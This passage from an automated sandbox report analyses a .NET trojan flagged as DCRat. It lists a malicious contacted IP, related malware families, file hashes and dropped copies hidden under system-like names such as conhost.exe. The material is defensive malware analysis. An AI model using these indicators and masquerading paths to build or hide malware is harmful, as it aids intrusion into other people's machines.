                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CPNSQusnwC.exe, powershell.exe | false | | high
                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | | high
                    https://github.com/Pester/Pester | powershell.exe | false | | high
                    http://schemas.xmlsoap.org/wsdl/ | powershell.exe | false | | high
                                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                  45.88.91.89 | unknown | Bulgaria | | 10753 | LVLT-10753US | true
                                  Joe Sandbox version: 41.0.0 Charoite
                                  Analysis ID: 1574710
                                  Start date and time: 2024-12-13 14:31:16 +01:00
                                  Joe Sandbox product: CloudBasic
                                  Overall analysis duration: 0h 10m 55s
                                  Hypervisor based Inspection enabled: false
                                  Report type: full
                                  Cookbook file name: default.jbs
                                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed: 60
                                  Number of new started drivers analysed: 0
                                  Number of existing processes analysed: 0
                                  Number of existing drivers analysed: 0
                                  Number of injected processes analysed: 0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode: default
                                  Analysis stop reason: Timeout
                                  Sample name: CPNSQusnwC.exe
                                  renamed because original name is a hash value
                                  Original Sample Name: A26ED7DC21BC77F20C0251FA25738D02.exe
                                  Detection: MAL
                                  Classification: mal100.troj.evad.winEXE@82/143@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information: Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: CPNSQusnwC.exe
Time | Type | Description
08:32:16 | API Interceptor | 696x Sleep call for process: powershell.exe modified
08:32:37 | API Interceptor | 2285642x Sleep call for process: explorer.exe modified
Match:LVLT-10753US
Associated Sample Name / URL | Detection | Threat Name | Context
b3astmode.sh4.elf | malicious | Mirai | 147.3.223.242
jade.m68k.elf | malicious | Mirai | 94.154.174.147
jade.mips.elf | malicious | Mirai | 64.8.51.71
jade.spc.elf | malicious | Mirai | 94.154.174.107
file.exe | malicious | Unknown | 94.154.172.218
jew.arm.elf | malicious | Unknown | 148.57.27.159
Needed Aircraft PN#_Desc_&_Qty Details.vbs | malicious | AsyncRAT, VenomRAT | 45.88.88.7
Turbo Generator_Pictures & Drawing.vbs | malicious | Unknown | 45.88.88.7
Payment Remittance Advice Details.vbs | malicious | Unknown | 45.88.88.7
List of Required PN#_Desc_&_Qty Details.vbs | malicious | Unknown | 45.88.88.7
Match:C:\Users\user\Desktop\AxLDtRxd.log
Associated Sample Name / URL | Detection | Threat Name
0wdppTE7Op.exe | malicious | DCRat, PureLog Stealer, zgRAT
JNKHlxGvw4.exe | malicious | DCRat, PureLog Stealer, zgRAT
xoCq1tvPcm.exe | malicious | DCRat, PureLog Stealer, zgRAT
Dfim58cp4J.exe | malicious | DCRat, PureLog Stealer, zgRAT
KyC6hVwU8Z.exe | malicious | DCRat
4si9noTBNw.exe | malicious | DCRat, PureLog Stealer, zgRAT
eu6OEBpBCI.exe | malicious | DCRat, PureLog Stealer, zgRAT
IYXE4Uz61k.exe | malicious | DCRat, PureLog Stealer, Xmrig, zgRAT
file.exe | malicious | Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar
FToZAUe1tw.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):265
                                                      Entropy (8bit):5.773816398795534
                                                      Encrypted:false
                                                      SSDEEP:6:m+nDurKq2O9jwImgSG/yMVAPkD7VsfPD3pQO95Txn:m+nKh7l3mXGaMqPKxsfPD3WOF
                                                      MD5:49BFAA1E17944A830C1430A6486C9ABF
                                                      SHA1:C37CA52F5B41199BC8687533FEF90088BD90C78E
                                                      SHA-256:033EFFBCF9E880CC9C71870FA0573D9C994E1F92D807261E38F5AC50FAB8DB4E
                                                      SHA-512:0739034C78F6C8DB94A1A7F0AFFEB33D490E6A039446E3A1F3B2E66C7679E7D0940324B913907CD2817F6EAF0D011B4684C27CAD4707ECC8B9F41B382E6B7A58
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with very long lines (925), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):925
                                                      Entropy (8bit):5.908330184990282
                                                      Encrypted:false
                                                      SSDEEP:24:tKSU096pkpNdNKlq+RJAuHlKrtUyJBC9ZqV3MXx6q4:tKSU0SkpDAJbLHwraQB+EZMXO
                                                      MD5:990DE2CA3EDF2949FF074F503008F92E
                                                      SHA1:B3EF01EFC6E075B42D2EFC653F0C7231176DAF3D
                                                      SHA-256:4C24FA304E9F7D37F52CFB777FA781C1A8F20FFEA001328F076FC4DBEC065085
                                                      SHA-512:565680EE91AA754C45FEC51E8C17B4B6158F7124982DEA6D1E8275CC7EEAC8BE3CC3D4DB20278C07A86DFCD687C75430928CE6AAC7B0C9D536528AAFB5CF4BB0
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with very long lines (457), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):457
                                                      Entropy (8bit):5.815659140813917
                                                      Encrypted:false
                                                      SSDEEP:12:mPq8170/ydtWB1j0dAr/ZiTuurUphdPZ0k0YVZvBU+r2IiJ:mPh70yd8r0eE41p0GB5r2b
                                                      MD5:9EA858B00D4615F401524467C0ED1D4C
                                                      SHA1:88B87D5E9F212364D73FFD6F580B841F79107E41
                                                      SHA-256:AEFEE1F5F663AC0D96E7CE13DE128F00235A05D818682DC2EF0AAD53E5215BAD
                                                      SHA-512:5DD5B48D80275D99B38EB5596322F791DB2819001B87011849420EA04A6F427E320AF4DE7F7A7B134CAD0DEFBB1C08EEA4B71073F9F21A6A5405A5F4C71E2DA7
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):52
                                                      Entropy (8bit):5.056020968057882
                                                      Encrypted:false
                                                      SSDEEP:3:9rDusx+8Z8c2uyKPOn:9FuVuPPOn
                                                      MD5:1F646936D6161A17FDF0C127D153A8D2
                                                      SHA1:3DE017E61E7C398CEBF6CBD272D64027995290FD
                                                      SHA-256:8B57906FB7D788AC05295878D2FA19569A410A5205B75D92EB97C2FB14DE529B
                                                      SHA-512:D826A8EC7EE82ADF2EB90186B015FC5DD17F7B4148015B4CF39DB2F11D755C64CC6FFD18BD799448A31293DDB05B461B44701DFD2CF72FF7E64D0B6331D7BA25
                                                      Malicious:false
                                                      Preview:JgcJoq6yw4Tq0fDzQQtfST5NYyMvkZyAZ9qvSsurpDtAHd3nKwjk
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1698
                                                      Entropy (8bit):5.367720686892084
                                                      Encrypted:false
                                                      SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                      MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                      SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                      SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                      SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with very long lines (488), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):488
                                                      Entropy (8bit):5.850803368771375
                                                      Encrypted:false
                                                      SSDEEP:12:+rUJ+/gcUxQLTpmwNpyfDtUCFF6wHAQeU:Pco4pH3EtUe8XQeU
                                                      MD5:64F7FAC040E6016B4F1C86B2BDD77447
                                                      SHA1:390EC8B7D460C3A1399A18328FBF744A78E8D085
                                                      SHA-256:FFE39D87A17D1FC87A7156ADF97283947D3C229CA765E688AEE08E9760951187
                                                      SHA-512:B7E2DE0828B51C664A50EDCD512366D4FF30B2371460925FB641273B7E1A210F139F404454CF653A983D92D01E0434A9063CE146D6E819919201A75D98176FF9
                                                      Malicious:false
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).....>J)...@.................................<.(.O.....(.p.....................)...................................................... ............... ..H............text.....(.. ....(................. ..`.rsrc...p.....(.......(.............@..@.reloc........).......(.............@..B................p.(.....H.............$.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):19253
                                                      Entropy (8bit):5.006124400658085
                                                      Encrypted:false
                                                      SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIepo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhipo+OdBANZD
                                                      MD5:3FD7630E6C29B02E0FFA6A1D3FB54564
                                                      SHA1:CA880B8896A98A6A2A46FB65611E07B78C4107AC
                                                      SHA-256:E5619477716ECB045FE2484E4C7318B58522BABF1CC931C6EA50603499400625
                                                      SHA-512:AA7E5DA85CC85499B0B8149D3BE9BDB767C606BCBFE54EF549B8DA65D1591A1E8014E5F1B43E281A8957DAA7BD0C68B66903FCB56E734A745981D623B2570D48
                                                      Malicious:false
                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):25
                                                      Entropy (8bit):4.0536606896881855
                                                      Encrypted:false
                                                      SSDEEP:3:mV+UNWkJu:MEkJu
                                                      MD5:F86996BDE943771B0F2F27DB4A7A0D91
                                                      SHA1:D9137C46AEF1E590888A7EE408BB7F55945AE4B9
                                                      SHA-256:6B0FA03706D8DB43945CAFE73FB3DB1C8FF26042F9C6E58A3483CAA107CF5F39
                                                      SHA-512:446FE662F2059A5E31CB858F211C4A2477F8A759F1BC5094FD6BF7B94CCAFAC7C9FBB524653D9ABE2BBED8851E791404CB4FE9BA8DE1F5BCE070E52334BB4F79
                                                      Malicious:false
                                                      Preview:3KElUwkfpMV1B3vf43Al4RBGR
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
